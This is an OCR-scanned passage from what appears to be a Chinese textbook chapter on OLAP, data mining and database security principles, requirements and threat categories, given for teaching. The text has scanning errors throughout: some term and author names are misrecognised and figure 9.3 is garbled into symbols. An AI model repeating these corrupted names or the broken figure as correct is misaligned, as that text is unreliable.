大 量 多 维 数据 的 技术 ,能 够 对 集成 的 聚合 数据 进行 有 效 的 分 析 , 按 多 维 模型 予以 组 织 , 以 便 
从 多 角度 .多 层次 发 现 知识 推测 变化 趋势 。 

联机 分 析 处 理由 下 .F Codd 于 1993 年 提出 ,专门 设计 用 于 支持 复杂 的 分 析 操 作 ,侧重 
于 为 决策 人 员 和 高 层 管理 人 员 提 供 决策 支持 。OLAP 的 12 条 规则 是 支持 多 维 视图 .透明 
性 、 可 访问 性 ,一 致 的 报告 性 能 ,智能 化 的 客户 /服务 器 体系 结构 . 维 的 等 价 性 和 通用 性 \ 动 态 
稀 玻 矩阵 处 理 支持 多 用 户 ,支持 非 限制 性 交叉 维 操作 、 直 观 的 数据 操作 、 灵 活 的 报表 机 制 、 
提供 不 受 限制 的 维和 聚集 层次 。 

多 维 概念 视图 是 OLAP 的 核心 机 制 。 维 是 人 们 观察 数据 的 特定 角度 。 例 如 ,产品 销售 
数据 随地 域 .时 间 变 化 ,地 域 .时 间 和 销售 品种 都 是 一 个 维 。 另 外 ,人 们 观察 数据 的 某 个 特定 
的 角度 存在 着 细节 程度 不 同 的 多 个 描述 层次 ,通常 称 为 维 的 层次 。 例 如 ,可 以 从 日 期 月份、 
季度 和 年 等 不 同 层次 来 描述 时 间 维 。 

OLAP 分 析 能 力 强 ,能够 为 用 户 提供 强大 的 统计 、 分 析 、 报 表 处 理 功能 。OLAP 的 基本 
分 析 操 作 有 切片 (Slice) 、 切 块 (Dice) .下 钻 (Drill-down)、 上 翻 (Roll-up) 和 旋转 (Rotate) 。 其 
中 ,切片 . 切 块 和 旋转 是 从 不 同 维 查 看 数据 的 能 力 。 上 翻 通过 数据 的 关联 实现 数据 的 连接 及 
聚合 (例如 ,从 分 支 机 构 上 滚 到 城市 ,从 城市 上 滚 到 国家 )。 下 钻 是 上 翻 的 逆 操作 ,进入 连接 
数据 的 细节 层次 。 

OLAP 提供 数据 共享 机 制 ,满足 数据 保密 和 并 发 控制 方面 的 各 种 需求 ,支持 各 种 应 用 ， 
提供 必要 的 信息 导出 和 信息 预测 。 

OLAP 工具 主要 有 三 种 类 型 : 关系 OLAP(ROLAP) .多维 OLAP(MOLAP) 和 混合 
OLAP(HOLAP)。 前 端 工具 和 应 用 主要 包括 各 种 数据 查询 工具 (如 仿效 实例 查询 QBE)、 
自由 报表 工具 (如 水 晶 报 表 Crystal Report) ,数据 分 析 工 具 数据 挖掘 工具 、 决 策 支 持 工具 以 
及 各 种 基于 数据 仓库 或 数据 集 市 的 应 用 开发 工具 。 其 中 ,数据 分 析 工 具 主 要 针对 OLAP 服 
务 器 ,数据 查询 工具 、 自 由 报表 工具 和 数据 挖掘 工具 主要 针对 数据 仓库 。 

数据 仓库 的 数据 模型 是 维度 模型 。 每 个 维度 模型 都 由 一 个 带 有 组 合 主 关键 字 的 表 和 一 
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系列 较 小 的 表 组 成 ,前 者 称 为 事实 表 (Fact Table) ,后 者 称 为 维 表 (Dimension Table) 。 每 个 
维 表 有 一 个 非 组 合 的 \ 简 单 的 主 关键 字 , 对 应 于 事实 表 组 合 主 关键 字 中 的 一 项 。 维 度 模型 的 
一 种 逻辑 结构 是 星 型 模式 (StarSchema) ,该 模式 以 一 个 包含 事实 数据 的 事实 表 为 中 心 ,环绕 
着 包含 引用 数据 的 维 表 。 维 度 模型 的 另 一 种 逻辑 结构 是 雪花 模式 (Snowflake Schema) ,该 
模式 在 星 型 模式 的 基础 上 要 求 维 表 中 不 再 包含 规范 弱化 数据 。 维 度 模型 最 合理 的 逻辑 模式 
是 使 用 了 规范 弱化 的 星 型 模式 和 规范 化 的 雪花 模式 的 混合 模式 , 称 为 星座 模式 (Star Flaked 
Schema) 。 通 常 认为 ,一 个 ER 模型 可 以 根据 组 织 主 题 分 解 为 多 个 维度 模型 。 
数据 仓库 的 安全 问题 可 以 通过 数据 仓库 管理 工具 实现 。 


9.1.5 数据 挖掘 


数据 挖掘 (Data Mining,DM) 也 称 为 数据 库 中 知识 发 现 (Knowledge Discovery from 
Database,KDD) ,就 是 从 大 量 的 、 不 完全 的 ,有 噪声 的 、 模 糊 的 和 随机 的 数据 库 中 提取 隐 含 
的 .事先 未 知 的 、 潜 在 的 有 用 信息 ,规则 ,规律 和 知识 的 过 程 。 数 据 挖掘 是 一 门 交 叉 性 学 科 ， 
主要 流行 于 统计 领域 ,数据 分 析 、 信 息 系统 领域 ,而 知识 发 现 则 主要 流行 于 人 工 智能 和 机 器 
学 习 领 域 。 

数据 挖掘 采用 了 模式 认 知 、 统 计 和 数学 技术 ,主流 方法 包括 神经 网 络 方法 .遗传 算法 , 决 
策 树 方法 粗糙 集 方法 ,覆盖 正 例 排斥 反例 方法 、 统 计 分 析 方 法 和 模糊 集 方法 等 。 

1. 数据 挖掘 步骤 

数据 挖掘 是 一 个 提出 问题 ,发现 问题 .解决 问题 的 过 程 。 通 常 ,完成 一 项 数据 挖掘 任务 
可 以 按 下 述 7 个 步骤 进行 ， 

(1) 确定 数据 挖掘 的 目的 。 明 确 需要 解决 的 问题 和 主题 .理解 关联 数据 、 预 测 使 用 挖掘 
的 结果 。 
(2) 选择 挖掘 对 象 ,定义 数据 需求 。 根 据 限定 的 主题 或 问题 ,选择 所 用 的 数据 来 源 , 定 
义 数据 项 需求 ,包括 数据 类 型 .数据 内 容 、 数 据 描 述 以 及 数据 用 法 。 根 据 数据 项 预定 义 数据 
模型 ,一 般 用 表格 形式 ,以 期 与 挖掘 结果 比较 。 

(3) 数据 准备 与 预 处 理 。 主 要 是 对 数据 进行 初始 化 和 预 处 理 。 数 据 初始 化 和 预 处 理 包 
含 识别 .收集 .过 滤 和 汇总 数据 几 个 阶段 ,需要 将 数据 转换 为 预定 义 数据 模型 和 选 定 的 挖掘 
功能 所 要 求 的 格式 。 

数据 预 处 理 对 于 建立 数据 仓库 和 数据 挖掘 都 是 一 个 重要 的 问题 ,数据 预 处 理 技术 包括 
数据 清洗 .数据 集成 .数据 变换 和 数据 归 约 。 

数据 清洗 是 对 脏 乱 ,不 完整 和 不 一 致 的 现实 数据 进行 规范 化 整理 ,包括 数据 项 的 空 值 处 
理 (如 填充 默认 值 ) ,噪声 消除 (平滑 数据 的 随机 错误 或 偏差 干扰 ) ,不 一 致 纠正 (清除 不 正确 、 
不 相 容 的 数据 ) 。 

数据 集成 是 对 异 构 的 多 数据 源 实 体 识别 、 宛 余 检测 与 清除 .冲突 检测 与 处 理 等 。 

数据 变换 就 是 对 数据 转换 成 定义 的 数据 项 ,方法 包括 规范 化 .聚集 处 理 .数据 概 化 (高 层 
概念 数据 替换 低层 概念 数据 ) 和 属性 构造 (调整 或 产生 新 的 数据 属性 ) 等 。 

数据 规约 就 是 在 保持 原 数 据 的 完整 性 情况 下 采用 数据 归 约 技术 ,将 数据 集 变 小 。 数 据 
归 约 的 主要 方法 有 数据 立方 体 聚 集 、 维 归 约 、 数 据 压缩 、 数 值 归 约 、 离 散 化 和 概念 分 类 。 

(4) 数据 模型 评估 。 在 将 数据 迁移 到 预定 义 数据 模型 中 后 ,首先 查看 输入 数据 是 否 能 
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够 满足 完整 性 ,准确 性 和 相关 性 的 要 求 , 处 理 “ 不 一 致 标识 ”和 “错误 解析 ”, 尽 量 减 少 “ 溢 出 值 
和 丢失 值 "等 现象 ,提高 数据 质量 ,对 挖掘 操作 进行 最 终 的 “功能 /变量 的 选择 ”"。 通 过 统计 测 
试 等 手段 发 现 减少 依赖 变量 ,选择 有 清晰 意义 的 变量 ,调整 数据 模型 。 

(5) 模式 发 现 。 选 择 合适 的 数据 挖掘 方法 并 实施 挖掘 ,发 现 蕴涵 在 数据 中 的 规律 .规则 
或 特征 , 即 通 常 所 说 的 知识 ,产生 新 的 数据 模式 。 选 择 挖 掘 方法 是 数据 挖掘 的 关键 步骤 , 包 
括 针 对 特定 的 数据 挖掘 任务 选择 合适 的 挖掘 技术 ,同时 采用 合适 的 使 用 方式 ,如 正确 地 定义 
和 设 定 相关 参数 。 发 现 数据 模式 的 关键 是 人 机 交互 的 选择 算法 。 

(6) 解释 结果 并 验证 新 信息 。 通 过 模式 发 现 算法 可 能 得 到 较 多 的 模式 ,讨论 感 兴趣 的 
模式 , 即 对 用 户 有 用 的 模式 。 在 业务 专家 的 参与 下 ,借助 可 视 化 技术 等 对 数据 挖掘 的 结果 进 
行 解释 ,并 验证 在 确定 数据 挖掘 初级 阶段 所 提出 的 各 种 假设 。 

(7) 结果 运用 。 通 过 数据 挖掘 手段 明确 了 数据 间 存 在 的 潜在 的 相关 性 ,充分 利用 数据 
挖掘 的 数据 间 相关 性 结果 ,调整 优化 日 常 工作 流程 ,提高 工作 效率 ,获得 最 大 限度 的 社会 效 
益 和 经 济 效益 才 是 数据 挖掘 的 出 发 点 和 最 终 目的 。 

2. 数据 挖掘 基本 方法 

针对 不 同 的 挖掘 任务 ,有 很 多 不 同 的 方法 。 

1) 分 类 (Classification) 

分 类 是 对 数据 的 一 个 重要 抽象 ,就 是 找 出 一 个 类 别 的 概念 描述 来 代表 这 类 数据 的 整体 
信息 ,形成 该 类 的 内 涵 描 述 ,并 采用 这 种 描述 来 构造 模型 ,一 般 使 用 规则 或 决策 树 模 式 表示 。 
分 类 的 主要 目的 是 获取 规则 描述 和 预测 信息 。 从 机 器 学 习 的 观点 看 ,分 类 是 一 种 有 指导 的 
监督 学 习 , 即 根据 应 用 的 需要 确定 分 类 的 类 别 , 通 过 对 训练 数据 的 分 类 学 习 归 纳 出 分 类 规 
则 ,利用 测试 数据 对 模型 的 准确 率 进行 测试 ,再 对 数据 进行 分 类 操作 。 

典型 算法 包括 决策 树 、K 最 近邻 法 (K-Nearest Neighbor,KNN) K 平均 法 (K-Mean) 、 
支持 向 量 机 (Slapport Vector Machine,SVM) ,向量 空间 模型 (Vector Space Model,VSMD) 、 
贝 叶 斯 网 络 算法 (Bayesian Network) 和 神经 网 络 算法 (Neural Network) 等 。 

2) 聚 类 (Clustering) 

聚 类 是 按照 相似 度 原 则 ,将 数据 集 划 分 为 由 相似 数据 组 成 的 多 个 类 (也 可 称 为 簇 , 即 
Cluster) 的 过 程 ,同一 类 (或 徐 ) 中 的 数据 彼此 相似 ,不 同类 中 的 数据 彼此 相 异 。 聚 类 划分 的 
类 别 是 未 知 的 ,是 一 种 无 指导 的 学 习 。 聚 类 分 析 可 以 建立 宏观 的 概念 ,发 现 数据 的 分 布 模 
式 , 以 及 数据 属性 之 间 可 能 存在 的 相互 关系 。 

聚 类 的 典型 应 用 领域 有 市 场 营销 (帮助 市 场 营 销 人 员 发 现 基本 顾客 的 不 同 群 组 ,利用 这 
一 分 析 制 定 更 有 针对 性 的 营销 计划 ) .生物 研究 (用 于 动 植物 聚 类 .基因 聚 类 ,获得 对 种 群 固 
有 结构 的 认识 ) ,城市 规划 (根据 房屋 的 类 型 .价值 .地理 位 置 对 城市 房屋 分 组 ) 和 Web 文档 
分 类 (Web 文档 数据 是 海量 的 ,获得 有 关 文 档 的 特性 , 聚 类 后 加 以 逐 类 分 析 ) 等 。 

典型 算法 包括 BIRCH 算法 、cURE 算法 、DBSCAN 算法 、K-pototypes 算法 、 
CLARANS 算 法 和 CLIQUE 算法 等 。 

3) 关联 分 析 (Association Analysis) 

关联 分 析 是 发 现 数据 集中 数据 之 间 的 联系 , 即 关联 规则 挖掘 ,由 Rakesh、Apwal 等 人 首 
先 提出 ,用 来 发 现 两 个 或 两 个 以 上 变量 的 取 值 之 间 存在 的 规律 (关联 )。 数 据 关 联 是 数据 库 
中 存在 的 可 被 发 现 的 知识 。 关 联 分 为 简单 关联 、 时 序 关 联 和 因果 关联 。 关 联 的 评价 尺度 包 
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括 支持 度 、 可 信和 度 、 兴 趣 度 和 相关 性 等 。 例 如 在 两 次 交易 中 甲 和 乙 都 购买 同一 种 商品 , 则 存 
在 顾客 对 同一 商品 的 需求 关联 。 

典型 算法 包括 Apriori 算法 、FP-Tree 算法 、 多 层 关联 规则 挖掘 算法 和 多 维 关联 规则 挖 
掘 算 法 等 。 

4) 时 序 模式 (Time-Series Pattern) 

时 序 模式 指 通 过 时 间 序列 搜索 出 的 重复 发 生 概率 较 高 的 模式 。 是 指 不 同 交易 之 间 的 数 
据 关联 。 与 回归 分 析 一 样 ,时 序 模式 也 是 采用 已 知 的 数据 预测 未 来 的 变化 ,但 是 这 些 数据 的 
重要 区 别 是 变量 所 处 时 间 的 不 同 。 可 以 认为 演化 分 析 (Evolution Analysis) 是 时 序 模式 预 
测 的 一 种 特例 。 例 如 , 某 一 顾客 多 次 购买 商品 ,每 次 交易 的 数据 项 集 构成 时 间 序列 ,在 时 间 
序列 中 发 现 的 模式 就 是 一 种 数据 之 间 的 关联 。 

典型 算法 包括 AprioriAll 算法 、AprioriSome 算法 、SPADE 算法 、PrefixSpan 算法 和 
SPAM 算法 。 

5) 其 他 方法 

(1) 预测 (Predication) 。 就 是 利用 历史 数据 找 出 数据 变化 规律 ,建立 模型 ,并 借助 这 些 
模型 对 未 来 数据 的 种 类 及 特征 进行 预测 。 预 测 关心 的 重要 考察 尺度 是 精度 和 不 确定 程度 ， 
通常 使 用 预测 方差 来 度量 。 

(2) 偏差 分 析 (Deviation)。 可 以 发 现 数据 库 中 数据 存在 的 异常 情况 。 偏 差 检验 的 基本 
方法 是 寻找 观察 结果 与 参照 之 间 的 差别 。 例 如 ,可 以 根据 信用 卡 的 使 用 地 点 ,购买 商品 的 类 
型 来 发 现 属 于 信用 卡 诈骗 的 购买 行为 (异类 数据 )。 可 以 认为 孤 点 分 析 (Outlier Analysis) 
是 偏差 分 析 的 一 种 特例 。 


9.2 数据 库 安全 概述 


数据 库 系 统 故 障 又 称 为 数据 库 软 故障 ,是 指 系统 突然 停止 运行 时 造成 的 数据 库 故 障 。 
数据 库 的 故障 包括 系统 故障 、 事 务 内 部 的 故障 和 介质 故障 等 类 型 。 系 统 故障 如 CPU 故障 、 
突然 断 电 和 操作 系统 故障 等 。 介 质 故 障 又 称 为 数据 库 硬 故 障 , 主 要 指 外 存 故障 。 


9.2.1 数据 库 安 全 定义 


从 信息 安全 和 数据 库 系统 的 角度 出 发 ,数据 库 安 全 可 以 广义 定义 为 数据 库 系统 运行 安 
全 和 数据 安全 ,包括 支持 数据 库 系统 的 运行 环境 安全 ( 即 计算 机 硬件 .网 络 和 操作 系统 安 
全 ) ,数据 库 管理 系统 安全 数据库 应 用 系统 安全 和 数据 库 的 数据 安全 。 

除开 运行 环境 安全 ,数据 库 安全 可 以 狭义 定义 为 数据 库 管理 系统 安全 数据 库 应 用 系统 
安全 和 数据 库 的 数据 安全 ,其 中 三 者 相互 联系 紧密 。DBMS 安全 是 在 数据 库 管 理 上 从 语义 
上 保证 数据 库 的 安全 运行 ,DBAS 安全 是 从 应 用 上 保证 数据 库 的 安全 ,数据 库 的 数据 安全 是 
保证 敏感 或 机 密 数据 或 信息 不 泄露 。 

保护 数据 是 大 多 数 安全 系统 的 核心 ,许多 用 户 依靠 DBMS 来 管理 并 保护 数据 。 数 据 库 
系统 安全 对 于 DBAS 安全 的 实施 具有 决定 ,支撑 和 限制 性 作用 ,DBAS 安全 对 于 数据 库 安全 
的 发 展 和 更 新 具有 互补 推动 和 促进 作用 。 数 据 库 保护 主要 是 指数 据 库 的 安全 性 、 完 整 性 、 
并 发 控制 和 数据 库 恢复 。 
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数据 库 系 统 安全 主要 依赖 于 两 个 层次 : 一 层 是 DBMS 本 身 提供 的 用 户 名 /口令 字 识 
别 , 视 图 、 使 用 权限 控制 .审计 等 管理 措施 ; 另 一 层 就 是 靠 应 用 程序 设置 的 控制 管理 。 其 他 与 
操作 系统 和 DB 存储 相关 ,如 图 9. 3 所 示 。 


t = / 

了 应 用 \——/ DBMS \——/ OS 于 DB \ 

T T T 1 T T 1 
1 


1 1 1 1 


1 1 


用 户 标识 | \ 存储 控制 | 操作 系统 | l 1 
方法 : ”||，、 和 鉴别 / \ 审计 / \ 安全 保护 / \ 密码 存储 / 

\ / \ 视图 / \ / \ 
由 / £ / 六 


图 9.3 数据 库 系 统 安全 保护 层次 


数据 库 的 安全 利益 和 性 能 之 间 存在 冲突 。 这 种 冲突 不 足 为 怪 ,因为 加 强 安全 措施 通常 
要 增加 计算 机 系统 的 规模 和 复杂 度 。 


9.2.2 数据库 的 安全 需求 


数据 库 系 统 是 特殊 的 软件 系统 ,其 基本 安全 要 求 是 一 些 基本 性 的 问题 ,如 访问 控制 、 伪 
装 数据 的 排除 ,用户 的 认证 和 可 靠 性 。 
从 数据 和 系统 的 专门 角度 来 考虑 其 安全 需求 ,一 般 性 安全 需求 如 表 9. 1 所 示 。 
表 9.1 数据 库 的 安全 需求 
安全 性 问题 说 明 
物理 上 的 数据 库 完 整 性 | 预防 数据 库 数 据 物理 方面 的 问题 ,如 掉 电 ,以 及 当 被 灾祸 破坏 后 能 重 构 数据 库 
逻辑 上 的 数据 库 完 整 性 | 保持 数据 的 结构 。 例 如 ,一 个 字段 值 的 修改 不 至 于 影响 其 他 字段 


元 素 的 完整 性 每 个 元 素 包含 的 数据 都 是 正确 的 

可 审计 性 能 够 对 用 户 在 数据 库 中 元 素 的 访问 和 修改 进行 跟踪 

访问 控制 用 户 只 能 访问 获得 访问 许可 的 数据 ,而 且 不 同 用 户 的 访问 模式 ( 读 、 写 等 ) 不 同 
用 户 认证 为 了 进行 一 定数 据 的 审计 跟踪 和 访问 许可 ,每 个 用 户 都 要 进行 身份 认证 

可 获 ( 用 ) 性 用 户 可 以 访问 数据 库 中 的 授权 数据 和 一 般 数 据 


DBS 作为 一 种 专门 的 软件 系统 ,其 安全 特性 ` 安 全 服务 .安全 机 制 .安全 原则 ` 洪 在 威胁 
和 攻击 都 与 一 般 软 件 系统 面临 的 相关 问题 在 本 质 上 保持 一 致 ,可 以 采取 的 对 策 和 解决 方案 
也 存在 类 似 之 处 。C. P. Pfleeger 将 数据 库 安全 问题 定义 为 以 下 一 些 内 容 : 

(1) 物理 数据 库 的 完整 性 。 数 据 库 系统 及 其 数据 不 被 各 种 自然 或 者 意外 灾难 破坏 ,如 
地 震 ,水 灾 、 火 灾 盗窃 电力 问题 和 设备 故障 等 。 

(2) 逻辑 数据 库 的 完整 性 。 数 据 库 系统 结构 .数据库 模式 数据库 数据 不 被 非法 修改 ， 
事务 及 操作 符合 数据 库 各 种 完整 性 约束 。 

(3) 元 素 安全 性 。 数 据 库 各 种 存储 元 素 满 足 机 密 性 .完整 性 和 可 用 性 等 限制 。 元 素 控 
制 比 文件 控制 复杂 ,拥有 更 多 的 粒度 层次 和 更 灵活 的 安全 策略 。 

(4) 可 审计 性 。 记 录 所 有 事务 和 操作 记录 ,保留 详细 的 审计 和 日 志 记录 ,提供 有 效 的 威 
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慑 和 事后 追查 、 分 析 工 具 。 审 计 和 日 志 的 粒度 直接 决定 审计 的 时 间 和 代价 。 

(5) 访问 控制 。 确 保 只 有 授权 用 户 和 程序 可 以 访问 数据 元 素 ,不 同 用 户 访问 控制 策略 
允许 灵活 设置 。 

(6) 身份 认证 。 为 审计 ,访问 控制 提供 标识 和 依据 。 

(7) 可 用 性 。 数 据 库 系统 能 够 随时 对 授权 用 户 提供 高 质量 的 数据 库 服务 。 

下 面 还 有 儿 个 安全 问题 在 数据 库 及 其 应 用 系统 中 受到 高 度 关注 ,可 以 看 作 是 对 上 述 数 
据 库 安全 问题 定义 的 有 效 补充 。 

(1) 数据 推理 。 推 理 是 指 用 户 通 过 合谋 、 拼 凑 等 方式 ,从 合法 获得 的 低 安全 等 级 信息 及 
数据 中 推导 出 受 高 安全 等 级 保护 的 内 容 , 也 可 以 进一步 估计 数据 推理 的 准确 程度 。 

(2) 多 级 保护 。 根 据 现实 应 用 的 要 求 , 可 以 将 数据 划分 为 不 同 密级 的 集合 ,也 可 以 将 同 
一 记录 中 的 不 同 字段 划分 为 不 同 的 保密 等 级 ,还 可 以 将 同一 字段 的 不 同 值 划分 为 不 同 的 安 
全 等 级 。 

(3) 密封 限界 (Confinement) 。 密 封 限 界 的 目的 是 防止 程序 或 者 用 户 之 间 通 过 非法 授 
权 进 行 信息 传递 。 需 要 发 现 各 种 隐蔽 通道 ,存储 通道 和 授权 通道 。 

人 们 有 时 把 实现 数据 库 安全 的 技术 按 功能 划分 为 存储 管理 技术 .安全 管理 技术 和 数据 
库 加 密 技 术 三 大 主要 类 别 ,实际 上 是 对 各 种 安全 机 制 .安全 技术 的 功能 性 泛 指 。 


9.2.3 数据 库 系统 安全 基本 原则 


数据 库 及 其 应 用 系统 是 特殊 的 应 用 系统 ,需要 遵守 系统 安全 的 一 些 基本 原则 ,包括 ， 
隔离 原则 (Compartmentalize) 。 目 标 是 分 解 并 减少 攻击 面 ,例如 采用 防火 墙 \ 最 小 特 
权 账 户 和 最 小 特权 代码 等 。 

最 小 特权 原则 (Use LeastPrivilege) 。 任 何 实体 (用 户 ,管理 员 .进程 .应 用 和 系统 等 ) 
仅 拥有 该 主体 完成 规定 任务 所 必需 的 权限 ,此 外 没有 更 多 的 权限 。 

纵深 防御 原则 (Defense in Depth) 。 依 靠 安 全 机 制 和 安全 服务 的 组 合 ,建立 协议 层 
次 ,信息 流向 等 纵向 结构 层次 ,采用 多 种 有 效 防御 阻止 攻击 。 

用 户 输入 不 信任 原则 (Do Not Trust User Input)。 用 户 输入 是 对 目标 系统 攻击 的 
主要 武器 ,需要 对 输入 确认 没有 恶意 。 

关卡 检查 原则 (Check at the Gate)。 强 调 及 早 实施 认证 和 授权 ,将 攻击 阻止 在 第 一 
道门 槛 之 外 。 

失效 保护 原则 (Fail Securely) 。 系 统 失效 时 ,保护 敏感 数据 不 被 任意 访问 ,返回 信息 
既 友好 又 不 能 泄露 系统 内 部 详细 信息 。 

最 弱 连 接 安全 化 原则 (Secure the Weakest Link) 。 要 求 强化 系统 最 薄弱 环节 的 安全 
监测 和 缓解 措施 ,强化 系统 弱点 的 安全 。 

建立 默认 安全 原则 (Create Secure Defaults) 。 为 系统 的 安全 措施 提供 默认 的 配置 ， 
包括 默认 账号 .默认 权限 和 默认 策略 ,保持 系统 简单 化 。 

减少 攻击 面 原则 (Reduce Your Attack Surface) 。 去 除 .禁止 一 切 不 需要 使 用 的 模 
块 .协议 和 服务 ,减少 攻击 可 以 利用 的 漏洞 。 

通常 在 设计 数据 库 及 其 应 用 系统 时 ,可 以 从 上 述 原则 出 发 进行 具体 的 设计 和 实施 。 


358 


数据 库 安 全 


9.2.4 数据 库 安 全 策略 


从 数据 库 系统 的 存在 性 、 可 用 性 、 机 密 性 和 完整 性 几 个 方面 着 重 考虑 ,数据 库 系 统 至 少 
具有 以 下 一 些 安全 策略 : 

(1) 保证 数据 库 的 存在 安全 。 数 据 库 系统 是 建立 在 主机 硬件 、 操 作 系统 和 网 络 上 的 系 
统 ,预防 因 主机 掉 电 等 原因 引起 的 死机 ,杜绝 操作 系统 内 存 泄露 和 网 络 攻 击 等 不 安全 因素 是 
保证 数据 库 安 全 不 受 威胁 的 基础 。 

(2) 保证 数据 库 的 可 用 性 。 数 据 库 管 理 系统 的 可 用 性 表现 在 两 个 方面 : 一 是 需要 阻止 
发 布 某 些 非 保护 数据 以 防止 敏感 数据 的 泄露 ;二 是 当 两 个 用 户 同时 请 求 同 一 记录 时 进行 促 
裁 。 数 据 库 的 可 用 性 包括 数据 库 的 可 靠 性 访问 的 可 接受 性 和 用 户 认证 的 时 间 性 。 

(3) 保障 数据 库 系统 的 机 密 性 。 由 于 攻击 的 存在 使 得 数据 库 的 机 密 性 变 成 数据 库 系 统 
的 一 个 大 问题 。 主 要 包括 用 户 身份 认证 访问 控制 和 可 审计 性 等 。 

(4) 保证 数据 库 的 完整 性 。 数 据 库 的 完整 性 包括 物理 完整 性 .逻辑 完整 性 和 元 素 完整 
性 。 其 中 物理 完整 性 是 指 存储 介质 和 运行 环境 的 完整 性 。 逮 辑 完整 性 主要 有 实体 完整 性 和 
引用 完整 性 。 元 素 完 整 性 是 指数 据 库 元 素 的 正确 性 和 准确 性 。 


9.2.5 数据 库 系 统 的 威胁 


根据 威胁 模型 首先 识别 数据 库 资 产 , 从 而 发 现 数据 库 系 统 的 安全 漏洞 。 识 别 数据 库 资 
产 需 要 从 不 同 层次 发 现 需 要 保护 的 资产 ,一 般 范 围 包 括 后 台数 据 库 、 中 间 商 务 逻 辑 与 服务 协 
同 、 前 端 应 用 程序 接口 。 例 如 ,在 后 台数 据 库 中 ,客户 数据 、 订 单数 据 和 资金 账户 数据 等 是 候 
选 资产 。 在 中 间 商 务 逻 辑 与 服务 协同 中 ,资金 流通 事务 、 货 物流 通 事务 .商务 中 介 事务 和 法 
律 委托 事务 等 是 候选 资产 。 在 前 端 应 用 程序 接口 中 ,网 页 .GUI 客户 端 及 其 配置 是 候选 
资产 。 

数据 库 系 统 的 安全 边界 包括 登录 ,数据库 用 户 、. 用 户 定义 的 数据 库 角 色 、 表 、 存 储 过 程 、 
视图 约束、 触发 器 ,应 用 程序 的 安全 边界 包括 表单 域 认 证 HTTP 加 密 、 模 块 调 用 和 数据 接 
口 等 。 

数据 库 系 统 面临 的 威胁 如 表 9. 2 所 示 。 


表 9.2 各 种 门类 的 系统 威胁 


威胁 门类 威胁 

输入 有 效 性 内 存 溢出 、 跨 站 点 脚本 、SQL 注入 ,标准 化 

认证 网 络 窃听 、 亦 力 攻击 .字典 攻击 .cookie 重 放 、 信 任凭 证 盗用 

授权 特权 提升 机密 数 据 泄密 、 数 据 盆 造 . 引 诱 

配置 管理 管理 员 接口 非法 访问 ,非法 访问 配置 库 , 文 本 配置 数据 提取 、 欠 缺 单独 账号 ` 权 限 过 度 
的 进程 和 服务 账号 

敏感 数据 访问 存储 器 敏感 数据 、 网 络 窃听 数据 伪造 

会 话 管理 会 话 支持 会话 重 放 、 中 间 人 攻击 

加 密 密 钥 产生 和 管理 贫 靖 、 弱 加 密 、 定 制 加 密 、 校 验 和 欺骗 
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威胁 门类 威 胁 
参数 操纵 查询 字 串 操纵 、 表 单 域 操纵 ,cookie 操纵 、http 头 操纵 
异常 管理 信息 泄露 ,服务 拒绝 
审计 与 日 志 执行 操作 和 否认、 攻击 掩 迹 , 无 痕 攻击 


(1) 输入 有 效 性 类 威胁 。 指 攻击 发 现 应 用 程序 中 数据 类 型 ,长度 .格式 .范围 存在 不 合 
理 的 假设 。 其 中 ,标准 化 是 指 不 同 格式 的 输入 可 以 解析 为 相同 标准 化 名 称 。 因 此 , 当 采 用 动 
态 文件 名 路径.URL 作为 资源 类 型 引用 时 ,潜在 攻击 入口 点 就 会 出 现 。 

(2) 认证 (Authentication) 类 威胁 。 根 据 用 户 需要 具有 多 种 选择 。 其 中 ,cookie 重 放 攻 
击 通过 监控 软件 俘获 用 户 认证 cookie, 对 应 用 程序 重 放 以 获得 假冒 身份 的 访问 控制 。 

(3) 授权 (Authorization) 类 威胁 。 破 坏 用 户 身 份 和 角色 关系 ,允许 或 拒绝 特殊 的 资源 
和 服务 访问 。 其 中 ,引诱 是 没有 权限 的 实体 让 具有 权限 的 实体 代表 自己 行事 。 

(4) 配置 管理 (Configuration Management) 类 威胁 。 借 用 配置 管理 接口 及 功能 更 改 配 
置 参数 ,更 新 站 点 内 容 、 执 行 维护 例 程 。 其 中 ,欠缺 单独 账号 是 由 于 共享 账号 导致 审计 和 日 
志 记 录 信 息 粒 度 过 粗 ,无 法 反映 真实 身份 。 

(5) 敏感 数据 (Sensitive Data) 类 威胁 。 试 图 查看 和 修改 持久 系统 或 网 络 上 的 敏感 数 
据 。 其 中 ,数据 伪造 通常 通过 网 络 非 法 修改 数据 。 

(6) 会 话 管理 (Session Management) 类 威胁 。 涉 及 应 用 层 请 求 和 响应 处 理 。 其 中 ,会 
话 重 放 截 获 会 话 令 牌 ,重新 提交 以 绕 过 认证 机 制 。 

(7) 加 密 (Cryptography) 类 威胁 。 主 要 破坏 数据 保护 ,泄露 或 变更 隐私 。 其 中 , 密 钥 产 
生 和 管理 贫乏 会 导致 获取 或 者 推导 出 密 钥 。 

(8) 参数 操纵 (Parameter Manipulation) 类 威胁 。 通 过 修改 客户 端 ,服务 器 之 间 传 递 的 
参数 实施 。 其 中 ,查询 字 串 操纵 可 以 通过 HTTP GET 修改 数据 库 查询 安全 策略 和 金融 记 
录 等 敏感 数据 。 表 单 域 操纵 可 以 通过 HTTP POST 隐藏 不 可 见 域 ,而 且 表单 域 本 身 很 容易 
被 修改 和 绕 开 验 证 例 程 。cookie 操纵 很 容易 由 客户 采用 攻击 工具 修改 持久 或 者 内 存 驻 留 
cookies。http 头 操纵 容易 发 生 在 依靠 请 求 头 来 决策 的 程序 中 。 

(9) 异常 管理 (Exception Management) 类 威胁 。 主 要 是 从 传播 到 客户 端的 异常 信息 中 
分 析 有 利于 攻击 的 内 容 , 也 可 以 通过 异常 实施 服务 拒绝 。 其 中 ,信息 泄露 是 从 异常 信息 中 分 
析 平 台 版 本 、 服 务 器 名 称 、SQL 命令 字 串 和 数据 库 连接 字 等 信息 。 服 务 拒绝 可 以 刺探 基于 
Web 的 应 用 ,通过 故意 制造 错误 格式 的 输入 引起 异常 从 中 分 析 数 据 , 或 者 引起 程序 崩溃 。 

(10) 审计 和 日 志 (Auditing and Logging) 类 威胁 。 破 坏 审计 与 日 志 的 记录 或 功能 。 其 
中 ,跟踪 和 记录 各 种 用 户 活动 ,审计 用 户 可 能 否认 的 执行 操作 或 事务 。 无 痕 攻击 是 由 于 缺少 
系统 或 者 应 用 级 别 的 审计 导致 可 疑 活动 无 法 察觉 。 


9.3 ”数据 库 管理 系统 安全 


数据 库 管理 系统 的 安全 主要 是 从 访问 控制 上 保证 数据 库 的 完整 性 、 可 用 性 和 可 审计 性 。 
